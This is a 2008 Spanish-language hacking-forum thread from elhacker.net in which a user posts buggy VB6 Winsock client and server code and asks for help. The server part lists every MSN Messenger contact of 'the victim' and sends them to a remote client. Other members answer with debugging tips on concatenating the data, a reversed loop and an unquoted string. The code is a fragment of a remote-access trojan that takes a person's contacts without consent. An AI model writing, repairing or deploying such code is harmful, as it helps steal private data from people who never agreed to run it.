elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  ayuda con el Winsock y envio de contactos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con el Winsock y envio de contactos  (Leído 1,496 veces)
Sai-To

Desconectado Desconectado

Mensajes: 180


Ver Perfil
ayuda con el Winsock y envio de contactos
« en: 20 Abril 2008, 22:24 pm »

saludos, bueno miren tengo este problema, es el siguiente....

Estoy haciendo un programa que me permite desde el cliente al darle a un command1 este envie por el Ws(Winsock) un dato o orden por decirlo asi, ahora que en el server cuando llegue este cheke si es el dato, pongan que es car, entonces el server ve si es car entonces este lista TODOS los contactos del MSN de la persona en una variable y los envia al cliente y el cliente comprueba que ese dato enviado contiene los contactos y los lista en un listbox ahora... este code esta correcto?

CLIENTE

Código:
Private sub Command1_Click()
ws.SendData car
End sub

SERVER

Código:
Private sub ws_DataArribal(LoQueVaAquixD)
dim dato as string
dim cont as long
dim user as IMessengerContact

ws.getdata dato
if dato = car then
for each user in MsgrUIA.MyContacts
cont = user.SigningName & "|"
next
end if
ws.SendData cont
end sub

CLIENTE


Código:
Private sub ws_DataArribal(LoQueVaAkixD)
dim datos as string
din contactos() As string

ws.GetData datos
if datos = cont then
contactos = Split(datos, "|")
for i = UBound(contactos) to LBound(Contactos)
List1.additem contactos(i)
next
end if
end sub

Sabiendo que lo que hace el code del server es enviar los contactos de la victima al cliente, este los esplitea y los lista en un listbox, ahora es correcto ese code?? y si no  lo es en que me he equivocado y como lo podria solucionar?...


En línea

SKL (orignal)

Desconectado Desconectado

Mensajes: 259


UpLoadSourceCode


Ver Perfil WWW
Re: ayuda con el Winsock y envio de contactos
« Respuesta #1 en: 22 Abril 2008, 05:18 am »

es porque estas enviando dato por dato y para enviar todos los contactos, primero los tenes que juntar a todos en 1 variable y despues enviarlo todo junto,.
Cuando llega al Servidor, lo delimitas con un split y los metes dentro del list...

es por eso que no te anda....


sl2


En línea

cobein


Desconectado Desconectado

Mensajes: 759



Ver Perfil WWW
Re: ayuda con el Winsock y envio de contactos
« Respuesta #2 en: 22 Abril 2008, 05:27 am »

for i = UBound(contactos) to LBound(Contactos)
En línea

http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.
cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: ayuda con el Winsock y envio de contactos
« Respuesta #3 en: 22 Abril 2008, 17:38 pm »

Código
  1. if dato = car then

¿Quien es car? no se supone que es una cadena y ¿entonces porque no esta entre comillas? ...

No coinciden los tipos...  :-\
« Última modificación: 22 Abril 2008, 17:41 pm por cΔssiΔnі » En línea

Sai-To

Desconectado Desconectado

Mensajes: 180


Ver Perfil
Re: ayuda con el Winsock y envio de contactos
« Respuesta #4 en: 22 Abril 2008, 19:48 pm »

si, grax, cassiani amigo ya resolvi ciertas cosas tontas que tengo hay! esa fue una! ;)... igualmente grax!"
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con envio archivos por winsock
Programación Visual Basic
newbie007 2 1,856 Último mensaje 15 Octubre 2011, 06:59 am
por BlackZeroX
Google, denunciada por el fallo que envió conversaciones a contactos equivocados
Noticias
wolfbcn 0 991 Último mensaje 30 Septiembre 2013, 21:30 pm
por wolfbcn
[Consulta] Winsock, envío de binarios.
Programación C/C++
lBoreal 2 1,573 Último mensaje 5 Abril 2017, 04:23 am
por jvm1994
AYUDA me hakearon mis contactos
Dudas Generales
juliango1 3 1,855 Último mensaje 26 Diciembre 2019, 13:29 pm
por Machacador
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines